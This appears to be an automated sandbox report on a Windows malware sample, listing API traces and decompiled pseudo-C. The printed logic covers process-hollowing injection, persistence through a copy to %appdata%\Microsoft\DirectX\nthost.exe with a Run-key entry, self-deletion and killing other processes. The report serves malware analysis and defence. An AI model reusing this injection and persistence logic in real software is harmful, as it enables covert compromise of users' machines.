    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0024E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0024E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0024E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0024E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0024E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0024E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0024E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0024E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0024E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0024E35A
    Memory Dump Source
    • Source File: 00000015.00000002.1565606818.0024D000.00000040.sdmp, Offset: 0024D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_21_2_24d000_obtG43AWHP.jbxd
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0024E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0024E4B6
      • Part of subcall function 0024E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0024E0C6
      • Part of subcall function 0024E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0024E0DC
      • Part of subcall function 0024E080: CreateProcessA.KERNEL32(?,00000000), ref: 0024E1C2
      • Part of subcall function 0024E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0024E1F0
    Strings
    Memory Dump Source
    • Source File: 00000015.00000002.1565606818.0024D000.00000040.sdmp, Offset: 0024D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_21_2_24d000_obtG43AWHP.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0024E54C
      • Part of subcall function 0024E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0024E493
      • Part of subcall function 0024E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0024E4B6
    Strings
    Memory Dump Source
    • Source File: 00000015.00000002.1565606818.0024D000.00000040.sdmp, Offset: 0024D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_21_2_24d000_obtG43AWHP.jbxd

    Non-executed Functions

    Memory Dump Source
    • Source File: 00000015.00000002.1565606818.0024D000.00000040.sdmp, Offset: 0024D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_21_2_24d000_obtG43AWHP.jbxd

    Executed Functions

    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char _v289;
    				long _t44;
    				long _t61;
    				long _t63;
    				CHAR* _t70;
    				CHAR* _t72;
    				struct HINSTANCE__* _t78;
    				struct HINSTANCE__* _t84;
    				char* _t94;
    				void* _t95;
    				intOrPtr _t99;
    				struct HINSTANCE__* _t107;
    				void* _t110;
    				void* _t112;
    				intOrPtr _t113;
    
    				_t110 = _t112;
    				_t113 = _t112 + 0xfffffee0;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v289, 0x105);
    				_v22 = 0;
    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t44 == 0) {
    					L3:
    					_push(_t110);
    					_push(0x4050c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t113;
    					_v28 = 5;
    					E00404E08( &_v289, 0x105);
    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t99);
    					 *[fs:eax] = _t99;
    					_push(E004050CC);
    					return RegCloseKey(_v12);
    				} else {
    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t61 == 0) {
    						goto L3;
    					} else {
    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t63 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v289);
    							L00401248();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t107 = 0;
    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t70 =  &_v289;
    								_push(_t70);
    								L00401250();
    								_t94 = _t70 +  &_v289;
    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
    									_t94 = _t94 - 1;
    								}
    								_t72 =  &_v289;
    								if(_t94 != _t72) {
    									_t95 = _t94 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _t95 - _t72);
    										_push( &_v22);
    										_push(_t95);
    										L00401248();
    										_t107 = LoadLibraryExA( &_v289, 0, 2);
    									}
    									if(_t107 == 0 && _v17 != 0) {
    										_push(0x105 - _t95 -  &_v289);
    										_push( &_v17);
    										_push(_t95);
    										L00401248();
    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
    										_t107 = _t78;
    										if(_t107 == 0) {
    											_v15 = 0;
    											_push(0x105 - _t95 -  &_v289);
    											_push( &_v17);
    											_push(_t95);
    											L00401248();
    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
    											_t107 = _t84;
    										}
    									}
    								}
    							}
    							return _t107;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 61%
    			E004050CC() {
    				void* _t28;
    				void* _t30;
    				struct HINSTANCE__* _t36;
    				struct HINSTANCE__* _t42;
    				char* _t51;
    				void* _t52;
    				struct HINSTANCE__* _t59;
    				void* _t61;
    
    				_push(0x105);
    				_push( *((intOrPtr*)(_t61 - 4)));
    				_push(_t61 - 0x11d);
    				L00401248();
    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
    				_t59 = 0;
    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
    					L14:
    					return _t59;
    				} else {
    					_t28 = _t61 - 0x11d;
    					_push(_t28);
    					L00401250();
    					_t51 = _t28 + _t61 - 0x11d;
    					L5:
    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
    						_t51 = _t51 - 1;
    						goto L5;
    					}
    					_t30 = _t61 - 0x11d;
    					if(_t51 != _t30) {
    						_t52 = _t51 + 1;
    						if( *((char*)(_t61 - 0x12)) != 0) {
    							_push(0x105 - _t52 - _t30);
    							_push(_t61 - 0x12);
    							_push(_t52);
    							L00401248();
    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
    						}
    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
    							_push(0x105 - _t52 - _t61 - 0x11d);
    							_push(_t61 - 0xd);
    							_push(_t52);
    							L00401248();
    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    							_t59 = _t36;
    							if(_t59 == 0) {
    								 *((char*)(_t61 - 0xb)) = 0;
    								_push(0x105 - _t52 - _t61 - 0x11d);
    								_push(_t61 - 0xd);
    								_push(_t52);
    								L00401248();
    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    								_t59 = _t42;
    							}
    						}
    					}
    					goto L14;
    				}
    			}












    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v52;
    				int _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char* _t52;
    				void* _t80;
    				char* _t87;
    				char* _t99;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				void* _t125;
    				intOrPtr _t139;
    				intOrPtr _t140;
    
    				_t137 = __esi;
    				_t136 = __edi;
    				_t139 = _t140;
    				_t110 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t110 = _t110 - 1;
    				} while (_t110 != 0);
    				_push(_t110);
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t139);
    				_push(0x418974);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				if(E00402944(__ebx, __esi) == 0) {
    					E004029A4(0,  &_v12);
    					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
    					E00403D1C();
    				}
    				_push(_t139);
    				_push(0x418925);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				E004029A4(1,  &_v16);
    				_t109 = E00407138(_v16, 0);
    				_t144 = _t109 - 0x10;
    				if(_t109 == 0x10) {
    					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
    					E004186D0(_v8, _t109, _t110, _t144);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
    					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
    					_push(_v20);
    					E00406EFC("DX9 C++RTL",  &_v28);
    					_pop(_t125);
    					E004185E8(_v28, _t109, _t125);
    					E004029A4(0,  &_v36);
    					E00406EFC(_v36,  &_v32);
    					_push(_v32);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
    					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
    					_pop(_t80);
    					E00404294(_t80, _v40);
    					if(0 == 0) {
    						__eflags = 1;
    						E00406FFC( &_v60);
    						_t87 = E00404348(_v60);
    						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
    					} else {
    						_push(1);
    						_push(0);
    						E00406FFC( &_v52);
    						_push(_v52);
    						_push(" DEL \"");
    						E004029A4(0,  &_v56);
    						E00404208();
    						_t99 = E00404348(_v48);
    						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
    					}
    					E00403D1C();
    				}
    				if(_t109 < 0x20) {
    					E00406FFC( &_v64);
    					_t52 = E00404348(_v64);
    					E004029A4(0,  &_v68);
    					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
    					E00403D1C();
    				}
    				_pop(_t116);
    				 *[fs:eax] = _t116;
    				_pop(_t117);
    				 *[fs:eax] = _t117;
    				_push(E0041897B);
    				return E00403EAC( &_v72, 0x11);
    			}
































    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004019B0() {
    				void* _t11;
    				signed int _t13;
    				intOrPtr _t19;
    				void* _t20;
    				intOrPtr _t23;
    
    				_push(_t23);
    				_push(E00401A66);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t23;
    				_push(0x4545c4);
    				L00401304();
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L0040130C();
    				}
    				E00401374(0x4545e4);
    				E00401374(0x4545f4);
    				E00401374(0x454620);
    				_t11 = LocalAlloc(0, 0xff8); // executed
    				 *0x45461c = _t11;
    				if( *0x45461c != 0) {
    					_t13 = 3;
    					do {
    						_t20 =  *0x45461c; // 0x0
    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
    						_t13 = _t13 + 1;
    					} while (_t13 != 0x401);
    					 *((intOrPtr*)(0x454608)) = 0x454604;
    					 *0x454604 = 0x454604;
    					 *0x454610 = 0x454604;
    					 *0x4545bc = 1;
    				}
    				_pop(_t19);
    				 *[fs:eax] = _t19;
    				_push(E00401A6D);
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L00401314();
    					return 0;
    				}
    				return 0;
    			}









    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 85%
    			_entry_() {
    				char _v24;
    				char _v28;
    				void* _t17;
    				void* _t21;
    				void* _t32;
    				void* _t33;
    				void* _t38;
    				void* _t39;
    				intOrPtr _t41;
    				void* _t42;
    
    				_v28 = 0;
    				_v24 = 0;
    				E00405ADC(0x418be0);
    				_push(0x418d7b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t41;
    				_push(_t40);
    				_push(0x418d4a);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t41;
    				_t42 = E00402944(_t32, _t39) - 2;
    				if(_t42 > 0) {
    					E004029A4(2,  &_v24);
    					E00404294(_v24, 0x418d94);
    					if(_t42 == 0) {
    						E004029A4(3,  &_v28);
    						DeleteFileA(E00404348(_v28)); // executed
    					}
    				}
    				E00418750(_t32, _t38, _t39); // executed
    				E00418A14(_t32, _t38, _t39);
    				E00418540(_t33);
    				E00418B90(_t33);
    				while(1) {
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    					if(_t17 == 0) {
    						continue;
    					}
    					L5:
    					E00418590(_t43);
    					while(E00418570() != 0) {
    						E004189E8();
    						Sleep(0x32);
    					}
    					_t21 =  *0x454a64; // 0x0
    					ResumeThread(_t21);
    					do {
    						goto L4;
    					} while (_t17 == 0);
    					goto L5;
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    				}
    			}














    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
    				void* _t3;
    
    				_push(0x454880);
    				_push(0x101); // executed
    				L0040C510(); // executed
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSAStartup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D1C() {
    				struct HINSTANCE__* _t24;
    				void* _t32;
    				intOrPtr _t35;
    				void* _t45;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L3:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t32);
    						 *0x419004 = 0;
    					}
    					L5:
    					while(1) {
    						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    							 *0x0045463C = 0;
    						}
